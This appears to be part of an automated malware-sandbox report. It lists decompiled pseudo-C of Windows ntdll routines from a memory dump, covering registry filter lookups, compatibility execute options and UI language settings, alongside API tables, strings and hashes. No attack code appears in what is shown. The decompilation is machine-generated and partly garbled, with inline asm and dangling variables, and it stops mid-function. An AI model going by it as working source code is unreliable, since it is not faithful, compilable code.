                                                                                                                            0x6b241710
                                                                                                                            0x6b241710
                                                                                                                            0x6b241713
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b241708
                                                                                                                            0x6b24170a
                                                                                                                            0x6b24170c
                                                                                                                            0x6b24171c
                                                                                                                            0x6b24171c
                                                                                                                            0x6b24171d
                                                                                                                            0x6b24171f
                                                                                                                            0x6b241727
                                                                                                                            0x00000000
                                                                                                                            0x6b241727
                                                                                                                            0x6b24170e
                                                                                                                            0x6b24170e
                                                                                                                            0x6b241715
                                                                                                                            0x00000000
                                                                                                                            0x6b241715
                                                                                                                            0x6b2416cc
                                                                                                                            0x6b1f9a45
                                                                                                                            0x6b1f9a45
                                                                                                                            0x6b1f9a0e
                                                                                                                            0x6b1f9a1c
                                                                                                                            0x6b1f9a23
                                                                                                                            0x6b24167e
                                                                                                                            0x6b24167f
                                                                                                                            0x6b241681
                                                                                                                            0x6b241683
                                                                                                                            0x6b241684
                                                                                                                            0x00000000
                                                                                                                            0x6b241684
                                                                                                                            0x00000000
                                                                                                                            0x6b1f9aad
                                                                                                                            0x6b1f9aad
                                                                                                                            0x6b1f9ab0
                                                                                                                            0x6b1f9ab3
                                                                                                                            0x6b1f9ab3
                                                                                                                            0x6b1f9ab6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1f9ab8
                                                                                                                            0x6b1f9aba
                                                                                                                            0x6b1f9abc
                                                                                                                            0x6b1f9ac8
                                                                                                                            0x6b1f9ac8
                                                                                                                            0x00000000
                                                                                                                            0x6b1f9abe
                                                                                                                            0x6b1f9abe
                                                                                                                            0x6b1f9ac0
                                                                                                                            0x00000000
                                                                                                                            0x6b1f9ac0
                                                                                                                            0x6b1f9abc
                                                                                                                            0x6b1f9ad2
                                                                                                                            0x00000000
                                                                                                                            0x6b1f9ad2
                                                                                                                            0x6b1f9aab

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                            • API String ID: 0-3178619729
                                                                                                                            • Opcode ID: 67422c5af2138c30269bdcf9092b4c8fbfb8489b55816fe7e6571dad8017a9fc
                                                                                                                            • Instruction ID: b21d2444d49ace2cf6c3981fb22c2d741759d4460163bfdd24a283c6c7ed36b9
                                                                                                                            • Opcode Fuzzy Hash: 67422c5af2138c30269bdcf9092b4c8fbfb8489b55816fe7e6571dad8017a9fc
                                                                                                                            • Instruction Fuzzy Hash: F4223570A0025AAFE709CF28C4D1B7ABBF5EF45705F1485A9E4558B782E73CE891CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D8239, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 233nativememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E6B1D8239(signed int* __ecx, long* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				long _v568;
				long _v572;
				intOrPtr _v576;
				short _v578;
				void* _v580;
				signed int _v584;
				intOrPtr _v586;
				void* _v588;
				void* _v592;
				void* _v596;
				intOrPtr _v600;
				long* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				void* _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t94;
				void* _t99;
				long _t118;
				intOrPtr _t125;
				short _t126;
				signed int* _t137;
				void* _t138;
				intOrPtr _t143;
				void* _t145;
				void* _t147;
				void* _t148;
				void* _t150;
				signed int _t151;
				void* _t152;
				signed int _t154;

				_t149 = __edx;
				_v12 =  *0x6b2cd360 ^ _t154;
				_v564 = _v564 & 0x00000000;
				_t151 = _a4;
				_t137 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t150 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(E6B1E6D30( &_v580, L"UseFilter") < 0) {
					L4:
					return E6B21B640(_t89, _t137, _v12 ^ _t154, _t149, _t150, _t151);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_push(2);
				_push( &_v580);
				_push( *_t137);
				_t89 = E6B219650();
				if(_t89 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t89 = 0;
					} else {
						_t94 =  *_t151;
						_t151 =  *(_t151 + 4);
						_v588 = _t94;
						_v584 = _t151;
						if(E6B1E6D30( &_v580, L"\\??\\") < 0) {
							goto L4;
						}
						if(RtlPrefixUnicodeString( &_v580,  &_v588, 1) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t151 + 8;
						}
						_t99 =  &_v560;
						_t143 = 0;
						_v596 = _t99;
						_v600 = 0;
						do {
							_t149 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t99);
							_push(0);
							_push(_t143);
							_push( *_t137);
							_t151 = E6B219820();
							if(_t151 < 0) {
								goto L37;
							}
							_t145 = _v596;
							_v580 =  *((intOrPtr*)(_t145 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t145 + 0xc));
							_v576 = _t145 + 0x10;
							_v636 =  *_t137;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t151 = E6B219600();
							if(_t151 < 0) {
								goto L37;
							}
							_t151 = E6B1E6D30( &_v580, L"FilterFullPath");
							if(_t151 < 0) {
								L36:
								_push(_v564);
								E6B2195D0();
								goto L37;
							}
							_t138 = _v592;
							_t118 = _v568;
							do {
								_push( &_v572);
								_push(_t118);
								_push(_t138);
								_push(2);
								_push( &_v580);
								_push(_v564);
								_t152 = E6B219650();
								if(_t152 == 0x80000005 || _t152 == 0xc0000023) {
									if(_t150 != 0) {
										RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t150);
									}
									_t147 =  *( *[fs:0x30] + 0x18);
									if(_t147 != 0) {
										_t150 = RtlAllocateHeap(_t147,  *0x6b2c7b9c + 0x180000, _v572);
										if(_t150 == 0) {
											goto L25;
										}
										_t118 = _v572;
										_t138 = _t150;
										_v596 = _t150;
										_v568 = _t118;
										goto L27;
									} else {
										_t150 = 0;
										L25:
										_t151 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t118 = _v568;
								}
								L27:
							} while (_t151 == 0x80000005 || _t151 == 0xc0000023);
							_v592 = _t138;
							_t137 = _v608;
							if(_t151 >= 0) {
								_t148 = _v592;
								if( *((intOrPtr*)(_t148 + 4)) != 1) {
									goto L36;
								}
								_t125 =  *((intOrPtr*)(_t148 + 8));
								if(_t125 > 0xfffe) {
									goto L36;
								}
								_t126 = _t125 + 0xfffffffe;
								_v616 = _t126;
								_v614 = _t126;
								_v612 = _t148 + 0xc;
								if(RtlCompareUnicodeString( &_v588,  &_v616, 1) == 0) {
									break;
								}
								goto L36;
							}
							_push(_v564);
							E6B2195D0();
							_t65 = _t151 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t151 = _t151 &  ~_t65;
							L37:
							_t99 = _v596;
							_t143 = _v600 + 1;
							_v600 = _t143;
						} while (_t151 >= 0);
						if(_t150 != 0) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t150);
						}
						if(_t151 >= 0) {
							_push( *_t137);
							E6B2195D0();
							 *_t137 = _v564;
						}
						_t85 = _t151 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t89 =  ~_t85 & _t151;
					}
					goto L4;
				}
				if(_t89 != 0xc0000034) {
					if(_t89 == 0xc0000023) {
						goto L3;
					}
					if(_t89 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}

















































                                                                                                                            0x6b1d8239
                                                                                                                            0x6b1d824b
                                                                                                                            0x6b1d824e
                                                                                                                            0x6b1d825d
                                                                                                                            0x6b1d8260
                                                                                                                            0x6b1d826e
                                                                                                                            0x6b1d8275
                                                                                                                            0x6b1d827b
                                                                                                                            0x6b1d827d
                                                                                                                            0x6b1d8287
                                                                                                                            0x6b1d8294
                                                                                                                            0x6b1d82ce
                                                                                                                            0x6b1d82de
                                                                                                                            0x6b1d82de
                                                                                                                            0x6b1d829c
                                                                                                                            0x6b1d829d
                                                                                                                            0x6b1d82a8
                                                                                                                            0x6b1d82a9
                                                                                                                            0x6b1d82b1
                                                                                                                            0x6b1d82b2
                                                                                                                            0x6b1d82b4
                                                                                                                            0x6b1d82bb
                                                                                                                            0x6b232dfa
                                                                                                                            0x6b1d82cc
                                                                                                                            0x6b1d82cc
                                                                                                                            0x6b232e19
                                                                                                                            0x6b232e19
                                                                                                                            0x6b232e1b
                                                                                                                            0x6b232e1e
                                                                                                                            0x6b232e30
                                                                                                                            0x6b232e3d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b232e5a
                                                                                                                            0x6b232e61
                                                                                                                            0x6b232e68
                                                                                                                            0x6b232e72
                                                                                                                            0x6b232e72
                                                                                                                            0x6b232e78
                                                                                                                            0x6b232e7e
                                                                                                                            0x6b232e80
                                                                                                                            0x6b232e86
                                                                                                                            0x6b232e8c
                                                                                                                            0x6b232e8c
                                                                                                                            0x6b232e92
                                                                                                                            0x6b232e93
                                                                                                                            0x6b232e99
                                                                                                                            0x6b232e9a
                                                                                                                            0x6b232e9c
                                                                                                                            0x6b232e9d
                                                                                                                            0x6b232ea4
                                                                                                                            0x6b232ea8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b232eae
                                                                                                                            0x6b232eb8
                                                                                                                            0x6b232ec3
                                                                                                                            0x6b232eca
                                                                                                                            0x6b232ed1
                                                                                                                            0x6b232edb
                                                                                                                            0x6b232ee3
                                                                                                                            0x6b232eef
                                                                                                                            0x6b232efb
                                                                                                                            0x6b232efc
                                                                                                                            0x6b232f08
                                                                                                                            0x6b232f12
                                                                                                                            0x6b232f13
                                                                                                                            0x6b232f22
                                                                                                                            0x6b232f26
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b232f3d
                                                                                                                            0x6b232f41
                                                                                                                            0x6b233069
                                                                                                                            0x6b233069
                                                                                                                            0x6b23306f
                                                                                                                            0x00000000
                                                                                                                            0x6b23306f
                                                                                                                            0x6b232f47
                                                                                                                            0x6b232f4d
                                                                                                                            0x6b232f53
                                                                                                                            0x6b232f59
                                                                                                                            0x6b232f5a
                                                                                                                            0x6b232f5b
                                                                                                                            0x6b232f5c
                                                                                                                            0x6b232f64
                                                                                                                            0x6b232f65
                                                                                                                            0x6b232f70
                                                                                                                            0x6b232f78
                                                                                                                            0x6b232f84
                                                                                                                            0x6b232f92
                                                                                                                            0x6b232f92
                                                                                                                            0x6b232f9d
                                                                                                                            0x6b232fa2
                                                                                                                            0x6b233004
                                                                                                                            0x6b233008
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23300a
                                                                                                                            0x6b233010
                                                                                                                            0x6b233012
                                                                                                                            0x6b233018
                                                                                                                            0x00000000
                                                                                                                            0x6b232fa4
                                                                                                                            0x6b232fa4
                                                                                                                            0x6b232fa6
                                                                                                                            0x6b232fa6
                                                                                                                            0x00000000
                                                                                                                            0x6b232fa6
                                                                                                                            0x6b232fab
                                                                                                                            0x6b232fab
                                                                                                                            0x6b232fab
                                                                                                                            0x6b232fab
                                                                                                                            0x6b232fb1
                                                                                                                            0x6b232fb1
                                                                                                                            0x6b232fc1
                                                                                                                            0x6b232fc7
                                                                                                                            0x6b232fcf
                                                                                                                            0x6b233020
                                                                                                                            0x6b23302a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b23302c
                                                                                                                            0x6b233034
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b233036
                                                                                                                            0x6b233039
                                                                                                                            0x6b233040
                                                                                                                            0x6b23304a
                                                                                                                            0x6b233067
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b233067
                                                                                                                            0x6b232fd1
                                                                                                                            0x6b232fd7
                                                                                                                            0x6b232fdc
                                                                                                                            0x6b232fe4
                                                                                                                            0x6b232fe6
                                                                                                                            0x6b233074
                                                                                                                            0x6b23307a
                                                                                                                            0x6b233080
                                                                                                                            0x6b233081
                                                                                                                            0x6b233087
                                                                                                                            0x6b233091
                                                                                                                            0x6b23309f
                                                                                                                            0x6b23309f
                                                                                                                            0x6b2330a6
                                                                                                                            0x6b2330a8
                                                                                                                            0x6b2330aa
                                                                                                                            0x6b2330b5
                                                                                                                            0x6b2330b5
                                                                                                                            0x6b2330b7
                                                                                                                            0x6b2330bf
                                                                                                                            0x6b2330c1
                                                                                                                            0x6b2330c1
                                                                                                                            0x00000000
                                                                                                                            0x6b232dfa
                                                                                                                            0x6b1d82c6
                                                                                                                            0x6b232ddd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b232de8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b232dee
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • RtlInitUnicodeStringEx.1105(?,UseFilter,?,00000000,?), ref: 6B1D828D
                                                                                                                            • ZwQueryValueKey.1105(?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 6B1D82B4
                                                                                                                            • RtlInitUnicodeStringEx.1105(?,\??\,?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 6B232E36
                                                                                                                            • RtlPrefixUnicodeString.1105(?,?,00000001,?,\??\,?,?,00000002,?,00000220,?,?,UseFilter,?,00000000,?), ref: 6B232E53
                                                                                                                            • ZwEnumerateKey.1105(?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\,?,?,00000002,?,00000220), ref: 6B232E9F
                                                                                                                            • ZwOpenKey.1105(00000000,?,?,?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\,?,?), ref: 6B232F1D
                                                                                                                            • RtlInitUnicodeStringEx.1105(?,FilterFullPath,00000000,?,?,?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\), ref: 6B232F38
                                                                                                                            • ZwQueryValueKey.1105(00000000,?,00000002,?,00000220,?,?,FilterFullPath,00000000,?,?,?,00000000,00000000,?,00000220), ref: 6B232F6B
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000000,00000000,?,00000002,?,00000220,?,?,FilterFullPath,00000000,?,?,?,00000000), ref: 6B232F92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUnicode$Init$QueryValue$EnumerateFreeHeapOpenPrefix
                                                                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                            • API String ID: 941260810-2779062949
                                                                                                                            • Opcode ID: e969695273cbb3e64bf6b86194c1351beb40597a753c651afd9402be86e8d443
                                                                                                                            • Instruction ID: e577f57a4d99d7cd08ba8fd2f90c2dc7cff67cb78668fd7b68a0a0991df6e778
                                                                                                                            • Opcode Fuzzy Hash: e969695273cbb3e64bf6b86194c1351beb40597a753c651afd9402be86e8d443
                                                                                                                            • Instruction Fuzzy Hash: 38A14BB191162DABDB21DF64CC88B9AB7F8FF44715F1001EAE908A7250D7399E85CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D40FD, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 195nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E6B1D40FD(void* __ecx) {
				signed int _v8;
				long _v548;
				signed int _v552;
				char _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t53;
				unsigned int _t66;
				void* _t68;
				wchar_t* _t73;
				intOrPtr _t77;
				short* _t85;
				wchar_t* _t98;
				signed int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x6b2cd360 ^ _t107;
				_v8 =  *0x6b2cd360 ^ _t107;
				_t105 = __ecx;
				if( *0x6b2c84d4 == 0) {
					L5:
					return E6B21B640(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E6B1EE9C0(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v552 = _t85;
					if(E6B1D42EB(_t105) != 0) {
						L15:
						_t103 = 2;
						_v552 = _t103;
						L10:
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E6B1D41EA(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
						}
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v552 = _t102;
						}
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v552);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E6B2196C0();
						}
						goto L4;
					}
					_v556 = _t85;
					_t102 =  &_v556;
					if(E6B1D429E(_t105 + 0x2c, _t102) >= 0) {
						if(_v556 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E6B265720(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v556);
						_v560 = 0x214;
						memset( &_v548, 0, 0x214);
						_t106 =  *0x6b2c84d4;
						_t110 = _t108 + 0x20;
						 *0x6b2cb1e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						if( *( *0x6b2c84d4)() == 0) {
							goto L8;
						}
						_t66 = _v560;
						if(_t66 == 0 || _t66 >= 0x214) {
							goto L8;
						} else {
							_t68 = (_t66 >> 1) * 2 - 2;
							if(_t68 >= 0x214) {
								E6B21B75A();
								goto L33;
							}
							_push(_t85);
							 *((short*)(_t107 + _t68 - 0x220)) = 0;
							E6B265720(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
							_t111 = _t110 + 0x14;
							_t73 = wcsstr( &_v548, L"Execute=1");
							_push(_t85);
							if(_t73 == 0) {
								E6B265720(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
								_t106 =  &_v548;
								_t98 = _t106;
								_t112 = _t111 + 0x14;
								_t77 = _t98 + _v560;
								_v556 = _t77;
								if(_t98 >= _t77) {
									goto L8;
								} else {
									goto L27;
								}
								do {
									L27:
									_t85 = wcschr(_t106, 0x20);
									if(_t85 != 0) {
										 *_t85 = 0;
									}
									E6B265720(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
									_t112 = _t112 + 0x10;
									E6B253E13(_t105, _t106);
									if(_t85 == 0) {
										goto L8;
									}
									_t41 = _t85 + 2; // 0x2
									_t106 = _t41;
								} while (_t106 < _v556);
								goto L8;
							}
							_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
							_push(3);
							_push(0x55);
							E6B265720();
							goto L15;
						}
					}
					L8:
					if(E6B1D41F7(_t105) != 0) {
						goto L15;
					}
					_t103 = _v552;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}




























                                                                                                                            0x6b1d410d
                                                                                                                            0x6b1d410f
                                                                                                                            0x6b1d411c
                                                                                                                            0x6b1d411e
                                                                                                                            0x6b1d4158
                                                                                                                            0x6b1d4168
                                                                                                                            0x6b1d4168
                                                                                                                            0x6b1d4126
                                                                                                                            0x6b1d4130
                                                                                                                            0x6b1d413c
                                                                                                                            0x6b2304a2
                                                                                                                            0x6b1d4142
                                                                                                                            0x6b1d414b
                                                                                                                            0x6b1d414b
                                                                                                                            0x6b1d414f
                                                                                                                            0x6b1d416b
                                                                                                                            0x6b1d4178
                                                                                                                            0x6b1d41d0
                                                                                                                            0x6b1d41d2
                                                                                                                            0x6b1d41d3
                                                                                                                            0x6b1d41a7
                                                                                                                            0x6b1d41b0
                                                                                                                            0x6b1d41db
                                                                                                                            0x6b1d41b2
                                                                                                                            0x6b1d41b8
                                                                                                                            0x6b1d41bf
                                                                                                                            0x6b1d41c1
                                                                                                                            0x6b1d41c1
                                                                                                                            0x6b1d41c5
                                                                                                                            0x6b1d41df
                                                                                                                            0x6b1d41e2
                                                                                                                            0x6b1d41e2
                                                                                                                            0x6b1d41c9
                                                                                                                            0x6b230628
                                                                                                                            0x6b230628
                                                                                                                            0x6b230630
                                                                                                                            0x6b230631
                                                                                                                            0x6b230633
                                                                                                                            0x6b230635
                                                                                                                            0x6b230635
                                                                                                                            0x00000000
                                                                                                                            0x6b1d41c9
                                                                                                                            0x6b1d417d
                                                                                                                            0x6b1d4183
                                                                                                                            0x6b1d4190
                                                                                                                            0x6b2304af
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2304b5
                                                                                                                            0x6b2304c8
                                                                                                                            0x6b2304d5
                                                                                                                            0x6b2304e5
                                                                                                                            0x6b2304ea
                                                                                                                            0x6b2304f6
                                                                                                                            0x6b230518
                                                                                                                            0x6b230522
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b230528
                                                                                                                            0x6b230530
                                                                                                                            0x00000000
                                                                                                                            0x6b230543
                                                                                                                            0x6b230545
                                                                                                                            0x6b23054e
                                                                                                                            0x6b230623
                                                                                                                            0x00000000
                                                                                                                            0x6b230623
                                                                                                                            0x6b230556
                                                                                                                            0x6b230557
                                                                                                                            0x6b23056f
                                                                                                                            0x6b230574
                                                                                                                            0x6b230583
                                                                                                                            0x6b23058a
                                                                                                                            0x6b23058d
                                                                                                                            0x6b2305b5
                                                                                                                            0x6b2305c0
                                                                                                                            0x6b2305c6
                                                                                                                            0x6b2305c8
                                                                                                                            0x6b2305cb
                                                                                                                            0x6b2305cd
                                                                                                                            0x6b2305d5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b2305db
                                                                                                                            0x6b2305db
                                                                                                                            0x6b2305e3
                                                                                                                            0x6b2305e9
                                                                                                                            0x6b2305ed
                                                                                                                            0x6b2305ed
                                                                                                                            0x6b2305fa
                                                                                                                            0x6b2305ff
                                                                                                                            0x6b230606
                                                                                                                            0x6b23060d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b230613
                                                                                                                            0x6b230613
                                                                                                                            0x6b230616
                                                                                                                            0x00000000
                                                                                                                            0x6b23061e
                                                                                                                            0x6b23058f
                                                                                                                            0x6b230594
                                                                                                                            0x6b230596
                                                                                                                            0x6b230598
                                                                                                                            0x00000000
                                                                                                                            0x6b23059d
                                                                                                                            0x6b230530
                                                                                                                            0x6b1d4196
                                                                                                                            0x6b1d419f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x6b1d41a1
                                                                                                                            0x00000000
                                                                                                                            0x6b1d4151
                                                                                                                            0x6b1d4151
                                                                                                                            0x6b1d4151
                                                                                                                            0x00000000
                                                                                                                            0x6b1d4151

                                                                                                                            APIs
                                                                                                                            • RtlImageNtHeaderEx.1105(00000003,?,00000000,00000000,?), ref: 6B1D4130
                                                                                                                            • ZwSetInformationProcess.1105(000000FF,00000022,?,00000004,00000003,?,00000000,00000000,?), ref: 6B230635
                                                                                                                            Strings
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 6B2305AC
                                                                                                                            • Execute=1, xrefs: 6B23057D
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 6B2305F1
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 6B2304BF
                                                                                                                            • ExecuteOptions, xrefs: 6B23050A
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 6B23058F
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 6B230566
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: HeaderImageInformationProcess
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 4034523672-484625025
                                                                                                                            • Opcode ID: c8db41c54c973aaaa2d87ef20ffa788b622393545042fa896a595cc900859223
                                                                                                                            • Instruction ID: 22e323e8cfbe48449289579ac88aad157f21fa6f1a1c5b817ba997554ebfbf85
                                                                                                                            • Opcode Fuzzy Hash: c8db41c54c973aaaa2d87ef20ffa788b622393545042fa896a595cc900859223
                                                                                                                            • Instruction Fuzzy Hash: D961197194021DBBEF119BA4DCCAFEA73F8AF28305F0401E9D61497181E778AA41CB70
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B28CF70, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 171nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 76%
                                                                                                                            			E6B28CF70(void* __ecx, intOrPtr _a4, intOrPtr _a8, unsigned int* _a12) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				intOrPtr _t61;
				char _t92;
				unsigned int* _t94;
				void* _t104;
				char _t105;
				unsigned int _t107;
				intOrPtr _t109;

				_v44 = 7;
				_t92 = 0;
				_t96 = 0x2000000;
				_v40 = 0;
				_v52 = 0;
				_v48 = 0;
				_t109 = E6B1DF108(0, __ecx, __ecx,  &_v40);
				if(_t109 >= 0) {
					if(_a4 != 1) {
						RtlInitUnicodeString( &_v36, L"Control Panel\\Desktop\\MuiCached");
						_v32 = _v48;
						_t104 = 0x18;
						_v28 =  &_v44;
						_push( &_v36);
						_push(0x20019);
						_v60 = 0;
						_push( &_v60);
						_v36 = _t104;
						_v24 = 0x40;
						_v20 = 0;
						_v16 = 0;
						_t109 = E6B219600();
						if(_t109 < 0) {
							L5:
							if(_t109 == 0x80000005) {
								goto L9;
							} else {
								_push(_v60);
								E6B2195D0();
								_v64 = _t92;
								RtlInitUnicodeString( &_v48, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings");
								_v48 = _t104;
								_v44 = _t92;
								goto L7;
							}
						} else {
							RtlInitUnicodeString( &_v44, L"MachinePreferredUILanguages");
							_push(0x2000000);
							_t96 = _v68;
							_t109 = E6B1DF018(_t96,  &_v52,  &_v60, 0,  &_v64);
							if(_t109 >= 0) {
								goto L9;
							} else {
								goto L5;
							}
						}
					} else {
						RtlInitUnicodeString( &_v36, L"Control Panel\\Desktop");
						_v36 = 0x18;
						_v32 = _v48;
						L7:
						_v68 = _t92;
						_v36 =  &_v52;
						_push( &_v44);
						_push(0x20019);
						_v32 = 0x40;
						_push( &_v68);
						_v28 = _t92;
						_v24 = _t92;
						_t109 = E6B219600();
						if(_t109 >= 0) {
							RtlInitUnicodeString( &_v52, L"PreferredUILanguages");
							_push(_t96);
